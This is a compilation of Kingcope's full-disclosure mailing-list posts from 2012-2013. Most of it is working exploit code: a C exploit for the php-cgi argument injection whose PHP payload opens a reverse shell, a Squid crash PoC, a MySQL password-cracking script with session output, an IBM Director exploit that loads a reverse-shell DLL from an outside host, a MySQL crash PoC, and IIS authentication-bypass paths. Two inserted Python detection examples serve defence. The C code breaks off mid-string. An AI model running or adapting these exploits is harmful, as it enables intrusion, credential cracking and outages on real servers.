Apache PHP Remote Exploit - apache-magika.c
(see attachment)

Signed,
Kingcope

```c
/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/*
This is a code execution bug in the combination of Apache and PHP.
On Debian and Ubuntu the vulnerability is present in the default install of
the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php.
The vulnerability makes it possible to execute the binary because this binary
has a security check enabled when installed with Apache http server and this
security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request
and will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the
security check is done when the php.ini configuration setting
cgi.force_redirect is set and the php.ini configuration setting
cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using
the -d switch.
If both values are set to zero and the request is sent to the server php-cgi
gets fully executed and we can use the payload in the POST data field to
execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described.
It does support SSL.
*/
/*
Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch

Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2

Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up

Unaffected versions are patched by CVE-2012-1823.
*/
/* apache-magica.c by Kingcope */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <stddef.h>
#include <openssl/rand.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

typedef struct {
    int sockfd;
    SSL *handle;
    SSL_CTX *ctx;
} connection;

void usage(char *argv[])
{
    printf("usage: %s --target target --port port --protocol http|https "
           "--reverse-ip ip --reverse-port port [--force-interpreter interpreter]\n",
           argv[0]);
    exit(1);
}

/* Query string: percent-encoded php-cgi switches, -d directives plus -n */
char poststr[] =
    "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"
    "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"
    "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"
    "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"
    "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"
    "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"
    "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"
    "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"
    "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"
    "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"
    "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"
    "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n"
    "Host: %s\r\n"
    "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 "
    "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: %d\r\n"
    "Connection: close\r\n\r\n%s";

/* PHP payload sent in the POST body (auto_prepend_file=php://input) */
char phpstr[] =
    "<?php\n"
    "set_time_limit(0);\n"
    "$ip = '%s';\n"
    "$port = %d;\n"
    "$chunk_size = 1400;\n"
    "$write_a = null;\n"
    "$error_a = null;\n"
    "$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n"
    "$daemon = 0;\n"
    "$debug = 0;\n"
    "if (function_exists('pcntl_fork')) {\n"
    "  $pid = pcntl_fork();\n"
    "  if ($pid == -1) {\n"
    "    printit(\"ERROR: Can't fork\");\n"
    "    exit(1);\n"
    "  }\n"
    "  if ($pid) {\n"
    "    exit(0);\n"
    "  }\n"
    "  if (posix_setsid() == -1) {\n"
    "    printit(\"Error: Can't setsid()\");\n"
    "    exit(1);\n"
    "  }\n"
    "  $daemon = 1;\n"
    "} else {\n"
    "  printit(\"WARNING: Failed to daemonise.\");\n"
    "}\n"
    "chdir(\"/\");\n"
    "umask(0);\n"
    "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
    "if (!$sock) {\n"
    "  printit(\"$errstr ($errno)\");\n"
    "  exit(1);\n"
    "}\n"
    "$descriptorspec = array(\n"
    "  0 => array(\"pipe\", \"r\"),\n"
    "  1 => array(\"pipe\", \"w\"),\n"
    "  2 => array(\"pipe\", \"w\")\n"
    ");\n"
    "$process = proc_open($shell, $descriptorspec, $pipes);\n"
    "if (!is_resource($process)) {\n"
    "  printit(\"ERROR: Can't spawn shell\");\n"
    "  exit(1);\n"
    "}\n"
    "stream_set_blocking($pipes[0], 0);\n"
    "stream_set_blocking($pipes[1], 0);\n"
    "stream_set_blocking($pipes[2], 0);\n"
    "stream_set_blocking($sock, 0);\n"
    "while (1) {\n"
    "  if (feof($sock)) {\n"
    "    printit(\"ERROR: Shell connection
```
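As an added defender-side example (not part of Kingcope's post or exploit), the following Python scans Apache access-log lines for the request shape the exploit sends: a query string with no literal `=` (so php-cgi takes it as argv) that decodes to `-d` directive overrides such as cgi.force_redirect=0. The log lines, addresses and paths are constructed.

```python
"""Detect CVE-2012-1823-style php-cgi argument injection in Apache access logs."""
import re
from urllib.parse import unquote_plus

# Request field of an Apache combined log line: "METHOD /path?query HTTP/1.x"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# php.ini directives the published exploit overrides with -d; any -d is already
# a finding, these are reported individually.
WATCHED_DIRECTIVES = {
    "cgi.force_redirect", "cgi.redirect_status_env", "auto_prepend_file",
    "allow_url_include", "disable_functions", "open_basedir", "safe_mode",
    "suhosin.simulation",
}


def classify_query(raw_query):
    """Return findings for one raw (still percent-encoded) query string.

    The CGI spec makes php-cgi treat the query as argv only when it contains
    no literal '='; the exploit hides every '=' as %3D to satisfy that, so
    the check must look at the raw query and decode afterwards.
    """
    findings = []
    if not raw_query or "=" in raw_query:
        return findings              # handed to the script as a normal query
    argv = unquote_plus(raw_query).split(" ")
    if not argv[0].startswith("-"):
        return findings              # no option switch, nothing for getopt
    findings.append("php-cgi argv injection: " + " ".join(argv))
    i = 0
    while i < len(argv):
        if argv[i] == "-d" and i + 1 < len(argv):
            name = argv[i + 1].split("=", 1)[0]
            if name in WATCHED_DIRECTIVES:
                findings.append("overrides " + argv[i + 1])
            i += 2
        else:
            i += 1
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        _, _, raw_query = match.group("target").partition("?")
        findings = classify_query(raw_query)
        if findings:
            hits.append((number, findings))
    return hits


# Constructed log lines; the second carries the exploit's encoded -d switches.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2013:10:01:07 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77'
    '%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%63%67%69%2E%66%6F%72%63%65'
    '%5F%72%65%64%69%72%65%63%74%3D%30+%2D%6E HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Mar/2013:10:01:09 +0000] "GET /search?term HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print("line %d:" % number, "; ".join(findings))
```

The same raw-versus-decoded distinction is why a WAF rule that only inspects the decoded query misses this pattern: the `=` check has to run before decoding.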
OpenSSL,OpenSSH ecdsa authentication code inconsistent return values.. no vulnerability?
Hello lists,

Attached is the blog post for the mentioned issues, which in their shape are not a vulnerability, but are still interesting to see.

http://kingcope.wordpress.com/2013/09/13/opensslopenssh-ecdsa-authentication-code-inconsistent-return-values-no-vulnerability/

Cheers,
Kingcope
ProFTPd mod_sftp/mod_sftp_pam invalid pool allocation in kbdint authentication
Hi there!

See my blog post about the mentioned vulnerability.

http://kingcope.wordpress.com/2013/09/11/proftpd-mod_sftpmod_sftp_pam-invalid-pool-allocation-in-kbdint-authentication/

Cheers,
Kingcope
Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption
Hello lists,

here you find the analysis of a vulnerability I recently discovered.

Mikrotik RouterOS 5.* and 6.* sshd remote preauth heap corruption
http://kingcope.wordpress.com/2013/09/02/mikrotik-routeros-5-and-6-sshd-remote-preauth-heap-corruption/

Additionally it includes a way to drop into a development shell for recent Mikrotik RouterOS versions.

Cheers,
Kingcope
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
hi...

I posted the advisory to make administrators aware that it will still be possible to read files with the apache uid even when suEXEC is in place. suEXEC is installed on many hosting providers. I read the cpanel site describing the patches [1], though standard apache httpd does not have these patches installed.

SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive.

If a hacker sees an apache installation using suEXEC, from an attacker's perspective it does not matter where the bug resides, either in Apache or in suEXEC. He just wants to circumvent the suEXEC protection so he can go the way described in the text I posted. This will aid him to escalate privileges further.

[1] http://docs.cpanel.net/twiki/bin/vief/EasyApache/Apache/SymlinkPatch#Frequently%20Asked%20Questions
Squid-3.3.5 DoS PoC
```perl
#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1|   Finished.  Wrote 0 entries.
#2013/07/15 20:48:36 kid1|   Took 0.00 seconds (  0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
#	total space in arena:    4100 KB
#	Ordinary blocks:         4046 KB      7 blks
#	Small blocks:               0 KB      0 blks
#	Holding blocks:           564 KB      2 blks
#	Free Small blocks:          0 KB
#	Free Ordinary blocks:      53 KB
#	Total in use:            4610 KB 112%
#	Total free:                53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for i686-pc-linux-gnu...
#2013/07/15 20:48:39 kid1| Process ID 2990
use IO::Socket;
my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146',
                                 PeerPort => '3128',
                                 Proto    => 'tcp');
# oversized value in the port position of the Host header
$a = "yc" x 2000;
print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n";
while(<$sock>) { print; }
```
Re: Kingcopes AthCon 2012 Slides Notes -- Video online
The video of my talk is online now. Happy watching.

https://www.youtube.com/watch?v=fYv5tqv1H3U

/Kingcope

2012/5/24 HI-TECH . <isowarez.isowarez.isowa...@googlemail.com>:
> Hello lists,
> you can view my slides notes for my talk entitled "Uncovering Zero-Days and advanced fuzzing" held at AthCon 2012 at the following places:
> http://www.isowarez.de/
> http://kingcope.wordpress.com/
> Cheerio,
> /Kingcope
New Blog Post: Attacking the Windows 7/8 Address Space Randomization
Hello List,

Below is a link to my new Blog Post,
http://kingcope.wordpress.com/2013/01/24/attacking-the-windows-78-address-space-randomization/

I hope you enjoy it!

Kingcope
MySQL Local/Remote FAST Account Password Cracking
FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks a lot like a minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the network pretty efficiently. During tests it was possible to test 5000 passwords per second over the network.

The method is as follows: The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user; this command can be used, as the name suggests, to change a user during a mysql session. Since mysql is very fast in doing this it is much more powerful to crack passwords rather than reconnecting every time to the mysql server to brute force passwords (which would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command it is a convenient way to crack passwords. (When connecting to mysql, in each connection attempt the SALT is always different and sent out by the server.)

Below is an example script and an example which uses John the Ripper's capabilities to generate passwords. The password "pass" for the user crackme is cracked in a matter of seconds. (about 10 passwords are tested in 20 seconds)

--- cracking script

```perl
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);
$crackuser = "crackme";
# one candidate password per line on stdin
while(<STDIN>) {
    chomp;
    $currentpass = $_;
    # COM_CHANGE_USER body: user\0 + length-prefixed scramble, reusing the connection salt
    $vv = join "\0", $crackuser, "\x14" . Net::MySQL::Password->scramble(
        $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
    ) . "\0";
    if (defined $mysql->_execute_command("\x11", $vv)) {
        print "[*] Cracked! -- $currentpass\n";
        exit;
    }
}
```

--- example session:

```text
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! -- pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
```

Greetings,
Kingcope
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
IBM System Director Remote System Level Exploit (CVE-2009-0880 extended zeroday)
Copyright (C) 2012 Kingcope

IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force it to load a dll remotely from a WebDAV share. The following exploit will load the dll from \\isowarez.de\director\wootwoot.dll; the wootwoot.dll is a reverse shell that will send a shell back to the attacker (the code has to be inside the dll initialization routine).

The IBM Director exploit works on versions 5.20.3 and before, but not on 5.2.30 SP2 and above.

Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0880

There was a prior CVE for it; the CVE states the attack can load local files only, but using the WebDAV server a remote file can be loaded too.

To scan for this software you can enter the following (by using pnscan):

```
./pnscan -w"M-POST /CIMListener/ HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n" -r "HTTP" <ipblock> 6988
```

Exploit:
---snip---
```perl
use IO::Socket;
#1st argument: target host
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => 6988,
                                 Proto    => 'tcp');
# CIM-XML ExportIndication message carried in the M-POST body
$payload = qq{<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0">
<MESSAGE ID="1007" PROTOCOLVERSION="1.0">
<SIMPLEEXPREQ>
<EXPMETHODCALL NAME="ExportIndication">
<EXPPARAMVALUE NAME="NewIndication">
<INSTANCE CLASSNAME="CIM_AlertIndication">
<PROPERTY NAME="Description" TYPE="string">
<VALUE>Sample CIM_AlertIndication indication</VALUE>
</PROPERTY>
<PROPERTY NAME="AlertType" TYPE="uint16">
<VALUE>1</VALUE>
</PROPERTY>
<PROPERTY NAME="PerceivedSeverity" TYPE="uint16">
<VALUE>3</VALUE>
</PROPERTY>
<PROPERTY NAME="ProbableCause" TYPE="uint16">
<VALUE>2</VALUE>
</PROPERTY>
<PROPERTY NAME="IndicationTime" TYPE="datetime">
<VALUE>20010515104354.00:000</VALUE>
</PROPERTY>
</INSTANCE>
</EXPPARAMVALUE>
</EXPMETHODCALL>
</SIMPLEEXPREQ>
</MESSAGE>
</CIM>};
# the listener path carries the UNC-style location of the dll to load
$req = "M-POST /CIMListener/isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
     . "Host: $ARGV[0]\r\n"
     . "Content-Type: application/xml; charset=utf-8\r\n"
     . "Content-Length: " . length($payload) . "\r\n"
     . "Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n"
     . "CIMOperation: MethodCall\r\n"
     . "CIMExport: MethodRequest\r\n"
     . "CIMExportMethod: ExportIndication\r\n\r\n";
print $sock $req . $payload;
while(<$sock>) { print; }
```
---snip---

Cheerio,
Kingcope
MySQL (Linux) Stack based buffer overrun PoC Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_bufferoverrun.pl (binary data)
MySQL (Linux) Heap Based Overrun PoC Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_heapoverrun.pl (binary data)
MySQL (Linux) Database Privilege Elevation Zeroday Exploit
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_privilege_elevation.pl (binary data)
MySQL Denial of Service Zeroday PoC
(see attachment)

Kingcope

5.5.19-log on SuSE Linux DoS exploit:

```perl
use Net::MySQL;
use Unicode::UTF8 qw[decode_utf8 encode_utf8];
$|=1;
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',   # Default use UNIX socket
    database => 'test',
    user     => "monty",
    password => "python",
    debug    => 1,
);
# raw COM_BINLOG_DUMP (0x12) with a malformed body; the server crashes on it
$mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo");
exit;
# unreachable after exit: left in the PoC by the author
for ($k=0;$k<5;$k++) { $a .= "<A$k>"; }
for ($k=0;$k<5;$k++) { $a .= "</A$k>"; }
# SELECT example
$mysql->query("SELECT UpdateXML('<a>$a<b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1");
my $record_set = $mysql->create_record_iterator;
while (my $record = $record_set->each) {
    printf "First column: %s Next column: %s\n", $record->[0], $record->[1];
}
$mysql->close;
```

Crash Log:

```text
started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2
120108 12:55:28 - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.

key_buffer_size=16777216
read_buffer_size=262144
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x8e6fa48
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 0xa868b35c thread_stack 0x3
/usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63]
/usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c]
[0xe400]
/usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4]
/usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac]
/usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63]
/usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc]
/lib/libpthread.so.0(+0x5b05)[0xb771cb05]
/lib/libc.so.6(clone+0x5e)[0xb74e7d5e]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query ((nil)): is an invalid pointer
Connection ID (thread ID): 12
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.
Version: '5.5.19-log'  socket: '/var/run/mysql/mysql.sock'  port: 3306  Source distribution

[New Thread 0xa8f1db70 (LWP 7907)]
120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known
120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xa8f1db70 (LWP 7907)]
mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 "", pos=<value optimized out>, flags=65535)
    at /root/mysql-5.5.19/sql/sql_repl.cc:1043
1043                   log_file_name, (llstr(my_b_tell(log), llbuff2), llbuff2));
(gdb) x/10i $eip
=> 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>:   mov    0x8(%ecx),%edx
   0x81bf54d <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373>:   mov    0x4(%ecx),%eax
   0x81bf550 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376>:   mov    %edx,0x4(%esp)
   0x81bf554 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380>:   mov    %eax,(%esp)
   0x81bf557 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383>:   call   0x8541560 <llstr>
   0x81bf55c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388>:   mov    -0x9b0(%ebp),%edx
   0x81bf562 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394>:   lea    -0x590(%ebp),%eax
   0x81bf568 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400>:   mov    %edi,0x1c(%esp)
   0x81bf56c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404>:   lea    -0x990(%ebp),%edi
   0x81bf572 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410>:   mov    %eax,0x18(%esp)
(gdb) i r
eax            0xa8f1c804       -1460549628
ecx            0x0      0
edx            0xa8f1c805       -1460549627
ebx            0x8e821e0        149430752
esp            0xa8f1be50       0xa8f1be50
ebp            0xa8f1c868       0xa8f1c868
esi            0xa8f1c81a       -1460549606
edi            0xa8f1c804       -1460549628
eip            0x81bf54a        0x81bf54a <mysql_binlog_send(THD*, char*,
```
MySQL Remote Preauth User Enumeration Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_userenum.pl (binary data)
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Correct, I tell that from experience because I've seen many configurations where the least privileged user has file privs enabled. If we leave it that way the attackers will be more happy; it's not a decision to patch it or not, just a hint.

Regards,
Kingcope

2012/12/2 Yves-Alexis Perez <cor...@debian.org>:
> On dim., 2012-12-02 at 21:17 +0100, king cope wrote:
> > My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges separated when with this exploit FILE privileges equate to ALL ADMIN privileges.
>
> Maybe because you might not want admins to have read/write access to the filesystem anyway?
>
> Regards,
> --
> Yves-Alexis
Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Hi Lists,

it seems Microsoft doesn't want to patch the vulnerabilities I posted back in June, at least not in the July update. The posting included some important bugs in the Internet Information Services, one of their flagship products:
http://seclists.org/fulldisclosure/2012/Jun/189

The July Security Bulletin doesn't mention any bug.
http://technet.microsoft.com/en-us/security/bulletin/ms12-jul

I wonder if Microsoft will silently patch the vulnerabilities or just bluntly ignore them. I understand that Microsoft doesn't want to make a big deal about the impact and exposure like in the past, yet I believe that admins should be informed about the threats by their very side. You have to remember that I put much effort into finding these vulnerabilities and you get them for free. By resolving the bugs Microsoft proves that they care about security even if these vulnerabilities were disclosed uncoordinated yet free to patch.

/Kingcope
IIS 6.0/7.5 Vulnerabilities [moderate risk] - ISOWAREZ BDAY RELEASE
THIS IS A GENUINE ISOWAREZ RELEASE

Title: Microsoft IIS 6.0 with PHP installed Authentication Bypass
Affected software: Microsoft IIS 6.0 with PHP installed (tested on Windows Server 2003 SP1 running PHP5)
Details: By sending a special request to the IIS 6.0 Service running PHP the attacker can successfully bypass access restrictions. Take for example:
1.) IIS/6.0 has PHP installed
2.) There is a Password Protected directory configured
--> An attacker can access PHP files in the password protected directory and execute them without supplying proper credentials.
--> Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php
IIS/6.0 will gracefully load the PHP file inside the admin directory if the ::$INDEX_ALLOCATION postfix is appended to the directory name. This can result in accessing administrative files and under special circumstances executing arbitrary code remotely.

Title: Microsoft IIS 7.5 Classic ASP Authentication Bypass
Affected Software: Microsoft IIS 7.5 with configured Classic ASP and .NET Framework 4.0 installed (.NET Framework 2.0 is unaffected, other .NET frameworks have not been tested) (tested on Windows 7)
Details: By appending :$i30:$INDEX_ALLOCATION to the directory serving the classic ASP file, access restrictions can be successfully bypassed. Take this example:
1.) Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files)
2.) There is a password protected directory configured that has administrative asp scripts inside
3.) An attacker requests the directory with :$i30:$INDEX_ALLOCATION appended to the directory name
4.) IIS/7.5 gracefully executes the ASP script without asking for proper credentials

Title: Microsoft IIS 7.5 .NET source code disclosure and authentication bypass
Affected Software: Microsoft IIS/7.5 with PHP installed in a special configuration (Tested with .NET 2.0 and .NET 4.0) (tested on Windows 7)
The special configuration requires the Path Type of PHP to be set to "Unspecified" in the Handler Mappings of IIS/7.5.
Details: The authentication bypass is the same as the previous vulnerabilities: Requesting for example http://victimIIS75/admin:$i30:$INDEX_ALLOCATION/admin.php will run the PHP script without asking for proper credentials.
By appending /.php to an ASPX file (or any other file using the .NET framework that is not blocked through the request filtering rules, like misconfigured .CS, .VB files) IIS/7.5 responds with the full source code of the file and executes it as PHP code. This means that by using an upload feature it might be possible (under special circumstances) to execute arbitrary PHP code.
Example: Default.aspx/.php

Cheerio and signed,
/Kingcope
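As an added example (not Kingcope's code, nor IIS's), the following Python models why the three bypasses above work and how a defender-side check avoids them: an authorization decision made on the raw request path misses `admin::$INDEX_ALLOCATION`, while one made on a canonical path (NTFS stream qualifiers stripped from each segment, path-info after a script file dropped) does not. The protected-directory list, the sample requests and the `naive_requires_auth` model are assumptions.

```python
"""Canonicalise IIS-style request paths before authorization checks and flag
the NTFS-stream and trailing-handler tricks from the advisories above."""
import re

# Constructed: directories that must require credentials (lower-case, trailing slash).
PROTECTED_PREFIXES = ("/admin/",)
# Extensions handled by script engines; anything after such a segment is PATH_INFO.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".php", ".cs", ".vb")
# NTFS stream/attribute qualifier inside a path segment, e.g. "::$INDEX_ALLOCATION"
# or ":$i30:$INDEX_ALLOCATION"; a colon is never valid in a Windows file name.
STREAM_RE = re.compile(r":[^/]*$")


def canonical_path(path):
    """Return (canonical_path, findings).

    Each segment has its NTFS stream qualifier removed, and the path is cut
    after the first script file so trailing segments like "/.php" cannot pick
    a different handler than the file they follow.
    """
    findings = []
    segments = path.split("/")
    kept = []
    for i, seg in enumerate(segments):
        if STREAM_RE.search(seg):
            findings.append("NTFS stream syntax in segment %r" % seg)
            seg = STREAM_RE.sub("", seg)
        kept.append(seg)
        if seg.lower().endswith(SCRIPT_EXTENSIONS) and i < len(segments) - 1:
            findings.append("path-info %r after script %r" % ("/".join(segments[i + 1:]), seg))
            break
    return "/".join(kept), findings


def naive_requires_auth(path):
    """Model (an assumption, not IIS's code) of the failing check: the raw URL
    is compared with the protected prefix, so 'admin::$INDEX_ALLOCATION' does
    not match '/admin/' although NTFS resolves it to the same directory."""
    return path.lower().startswith(PROTECTED_PREFIXES)


def requires_auth(path):
    """Hardened check: decide on the canonical path, not the raw one."""
    canon, _ = canonical_path(path)
    return canon.lower().startswith(PROTECTED_PREFIXES)


def audit(paths):
    """Return the requests whose raw and canonical authorization answers differ."""
    return [p for p in paths if naive_requires_auth(p) != requires_auth(p)]


# Constructed requests built from the advisories' examples.
SAMPLE_REQUESTS = [
    "/admin/index.php",
    "/admin::$INDEX_ALLOCATION/index.php",
    "/admin:$i30:$INDEX_ALLOCATION/admin.php",
    "/Default.aspx/.php",
    "/public/index.php",
]

if __name__ == "__main__":
    for p in SAMPLE_REQUESTS:
        print(p, "->", canonical_path(p), "auth:", requires_auth(p))
```

The findings list doubles as a detection signal: any segment containing a colon, or path-info following a script file, is worth logging even when the canonical check already denies the request.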